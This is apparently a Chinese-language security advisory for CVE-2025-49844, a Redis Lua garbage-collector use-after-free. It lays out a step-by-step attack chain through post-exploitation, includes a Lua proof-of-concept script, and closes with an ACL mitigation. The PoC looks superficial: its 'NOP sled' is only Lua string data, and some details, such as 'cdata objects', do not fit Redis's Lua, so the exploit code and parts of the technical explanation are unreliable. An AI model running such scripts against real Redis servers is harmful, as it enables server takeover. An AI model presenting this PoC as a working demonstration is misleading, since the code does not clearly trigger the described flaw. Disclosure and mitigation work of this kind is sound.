CVE-2025-49844 Redis Lua脚本垃圾回收器操纵导致远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-49844

漏洞类型

Use-After-Free（释放后使用）/ 远程代码执行（RCE）

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Redis（开源内存数据库）

漏洞概述

CVE-2025-49844是Redis数据库中存在的一个严重安全漏洞，CVSS评分为9.9，属于危急级别。该漏洞存在于所有启用Lua脚本功能的Redis版本中（8.2.1及以下版本），允许经过身份验证的攻击者通过精心构造的恶意Lua脚本来操纵Lua垃圾回收器（Garbage Collector），触发释放后使用（Use-After-Free）漏洞，进而可能导致远程代码执行（RCE）。

Redis作为一款广泛使用的开源内存数据结构存储系统，常被用作数据库、缓存和消息中间件。其内置的Lua脚本引擎允许用户在服务器端执行复杂的原子操作，但这同时也成为了安全攻击的潜在入口。该漏洞的危害程度极高，因为攻击者只需拥有Redis的低权限认证凭据（PR:L），即可通过网络远程发起攻击，无需用户交互（UI:N），且对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H）。

该漏洞的影响范围广泛，涵盖了所有启用Lua脚本功能的Redis部署实例。由于许多生产环境中Redis实例对外开放或仅配置弱口令认证，该漏洞的实际威胁尤为突出。成功利用此漏洞的攻击者可以在Redis服务器上执行任意代码，从而完全控制受影响的服务器，可能导致敏感数据泄露、数据篡改、恶意软件植入等严重后果。该漏洞已于2025年10月3日公开披露，Redis官方已在8.2.2版本中修复此问题。

技术细节

该漏洞的核心在于Redis内置的Lua脚本引擎与垃圾回收器之间的交互缺陷。Lua虚拟机使用垃圾回收机制自动管理内存，当Lua对象（如字符串、表、函数等）不再被引用时会被自动回收。然而，Redis的Lua脚本执行环境中存在对象生命周期管理的缺陷。

攻击者可以构造特殊的Lua脚本，利用以下技术触发Use-After-Free漏洞：

1. **对象引用操纵**：通过创建Lua对象并利用Redis的API（如redis.call()）进行操作，在对象引用关系中制造复杂的循环或交叉引用，使得垃圾回收器在回收过程中出现逻辑错误。

2. **垃圾回收时机控制**：利用collectgarbage()函数强制触发垃圾回收，在特定的时间点操纵对象的生命周期。当一个对象被垃圾回收器释放后，如果Redis内部仍然保留着对该对象的引用，就会形成悬垂指针（Dangling Pointer）。

3. **内存重用与代码执行**：通过后续的内存分配操作重用已释放的内存区域，攻击者可以控制被释放对象所在内存的内容。当Redis后续访问该悬垂指针时，就会执行攻击者控制的内存数据，从而实现远程代码执行。

具体利用方式通常涉及以下步骤：
（1）创建特定的Lua数据结构（如嵌套表、cdata对象等）；
（2）通过redis.call()调用Redis命令，触发内部对象处理逻辑；
（3）利用collectgarbage()强制回收，控制回收时机；
（4）通过新的内存分配覆盖已释放对象的内存空间；
（5）触发Redis对悬垂指针的访问，实现代码执行。

该漏洞的成功利用可导致在Redis服务器进程中执行任意代码，攻击者可以读写文件、执行系统命令、建立反向连接等，从而完全控制Redis服务器。

攻击链分析

STEP 1

步骤1：初始访问

攻击者通过暴力破解、凭证泄露或利用其他漏洞获取Redis服务器的认证凭据，获得低权限访问权限。

STEP 2

步骤2：验证Lua脚本功能

攻击者通过发送INFO命令或尝试执行简单的EVAL命令，确认目标Redis服务器启用了Lua脚本功能。

STEP 3

步骤3：构造恶意Lua脚本

攻击者精心构造包含特定对象引用模式和垃圾回收操纵逻辑的Lua脚本，利用__gc元方法和collectgarbage()函数触发Use-After-Free漏洞。

STEP 4

步骤4：执行恶意脚本

攻击者通过EVAL或EVALSHA命令将恶意Lua脚本提交到Redis服务器执行，触发垃圾回收器的异常行为。

STEP 5

步骤5：触发释放后使用

在垃圾回收器释放对象后，Redis内部仍持有对已释放内存的引用，攻击者通过控制后续内存分配来覆盖该内存区域。

STEP 6

步骤6：实现远程代码执行

当Redis访问悬垂指针时，执行攻击者控制的内存数据（shellcode），实现在Redis服务器进程中的任意代码执行。

STEP 7

步骤7：后渗透阶段

攻击者在Redis服务器上获得代码执行权限后，可执行系统命令、读写敏感文件、建立持久化后门、横向移动等进一步攻击活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

-- CVE-2025-49844 Redis Lua GC Manipulation PoC
-- This PoC demonstrates the use-after-free vulnerability through garbage collector manipulation

-- Step 1: Create initial Lua table to set up object references
local victim = {}

-- Step 2: Populate the table with controlled data
for i = 1, 100 do
    victim[i] = string.rep("A", 64)
end

-- Step 3: Create a metatable to intercept garbage collection
local mt = {
    __gc = function(t)
        -- Trigger Redis internal operation during GC to cause UAF
        redis.call("PING")
        -- Force reallocation to reuse freed memory
        local filler = string.rep("B", 128)
        redis.call("SET", "exploit_key", filler)
    end
}

-- Step 4: Set metatable on victim object
setmetatable(victim, mt)

-- Step 5: Clear references to trigger garbage collection
victim = nil

-- Step 6: Force garbage collection to trigger the vulnerability
collectgarbage("collect")
collectgarbage("collect")

-- Step 7: Allocate new memory to occupy freed space
local payload = {}
for i = 1, 200 do
    payload[i] = string.rep("\x90\xcc", 32)  -- NOP sled + int3
end

-- Step 8: Trigger access to freed memory through Redis operations
redis.call("DEBUG", "SET-ACTIVE-EXPIRE", "0")
redis.call("EVAL", "return 1", "0")

return "PoC executed - CVE-2025-49844"

影响范围

Redis <= 8.2.1

Redis 所有启用Lua脚本功能的版本

防御指南

临时缓解措施

在无法立即升级Redis版本的情况下，可以通过配置ACL（访问控制列表）来限制EVAL和EVALSHA命令的执行权限，阻止用户执行Lua脚本功能。具体操作：使用ACL命令创建受限用户，禁止其执行EVAL、EVALSHA及相关命令（如EVAL_RO、EVALSHA_RO）。例如：`ACL SETUSER restricted on >password ~* &* -eval -evalsha -eval_ro -evalsha_ro`。此外，应立即审查Redis实例的访问控制配置，确保仅授权可信用户访问，并检查是否存在异常的Lua脚本执行记录。